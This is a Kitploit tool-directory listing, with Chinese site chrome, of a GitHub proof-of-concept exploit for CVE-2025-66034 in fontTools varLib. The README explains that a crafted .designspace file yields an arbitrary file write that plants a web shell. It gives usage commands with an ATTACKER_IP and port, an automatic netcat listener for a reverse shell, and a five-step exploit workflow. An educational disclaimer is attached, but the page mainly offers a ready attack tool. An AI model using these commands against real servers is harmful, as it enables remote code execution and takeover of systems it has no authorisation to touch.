Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
varlib-cve-2025-66034 — Proof-of-concept exploit for CVE-2025-66034 in the fontTools variable font generation pipeline. A crafted .designspace file allows control of the output path, enabling arbitrary file writes. The script automates payload creation, font generation, and upload to demonstrate the issue. | Kitploit
工具/GitHubGitHub/symphony2colour/varlib-cve-2025-66034
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubsymphony2colour/varlib-cve-2025-66034

varlib-cve-2025-66034

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

关于

Proof-of-concept exploit for CVE-2025-66034 in the fontTools variable font generation pipeline. A crafted .designspace file allows control of the output path, enabling arbitrary file writes. The script automates payload creation, font generation, and upload to demonstrate the issue.

210天前尚未审核
分享
内容在请求的语言中不可用。显示英文版本。

fontTools varLib CVE-2025-66034 Exploit

cve component vulnerability vector impact language dependency license

This repo doesn't introduce a new vulnerability.

This is a Proof-of-concept exploit for CVE-2025-66034 affecting the fontTools varLib variable font generation pipeline.

The vulnerability allows attackers to control the output filename inside a crafted .designspace file. When processed by a vulnerable font generation service, this can lead to arbitrary file write on the server filesystem.

The script varlib_cve_2025_66034.py automates payload creation, font generation, upload, and optional shell triggering.


Features

  • Automatic creation of compatible master fonts using fontTools
  • Randomized shell filename generation
  • Customizable target path and upload endpoint
  • Automatic nc listener
  • No manual font preparation required

Requirements

Python 3.9+

Install dependencies:

root@kitploit:~
pip install fonttools requests

Netcat is required for the listener, therefore the next command is required if you use --no-listen option:

root@kitploit:~
nc -lvnp <PORT_NUMBER>

Usage

If your target is a self-hosted lab running on mysite.com, and the upload path, filesystem write path, and web-accessible trigger path match the defaults in the script, you can run it directly.

Basic usage:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>

Highly likely the target uses different URLs or filesystem paths, override the defaults with the available options below, such as --url, --path, and --trigger or modify script manually

Note: the multipart upload form names may vary depending on the environment. If the target does not use the same form field names as the script, adjust them in the files section before running the exploit.

Options

Example with custom options:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com

Exploit Workflow

  1. Generate compatible master fonts
  2. Create malicious .designspace file
  3. Upload payload via multipart POST
  4. Write arbitrary file on the server
  5. Trigger the payload via HTTP request

Credits / Acknowledgements

Special thanks and respect to:

  • The fontTools project maintainers and contributors for their work on the open-source fontTools library.
  • The security researchers who discovered and responsibly disclosed CVE-2025-66034.
  • The open-source security community for documenting and analyzing vulnerabilities that help improve software security.

This proof-of-concept is provided for educational and research purposes to help understand the vulnerability and its impact.


Disclaimer

This code is provided for educational and research purposes only.

Do not use this exploit against systems you do not own or have explicit permission to test.

The author is not responsible for misuse or damage caused by this software.


References

  • CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
  • GitHub Advisory: https://github.com/advisories/GHSA-768j-98cg-p3fv
  • fontTools Project: https://github.com/fonttools/fonttools
  • fontTools Documentation: https://fonttools.readthedocs.io/
下载工具
ArgumentDescription
--ipAttacker listener IP
--portListener port
--pathTarget filesystem path where the file will be written (must be web-accessible to trigger a web shell)
--urlUpload endpoint, form may vary
--triggerBase URL used to trigger the written payload after upload
--no-listenDisable automatic netcat listener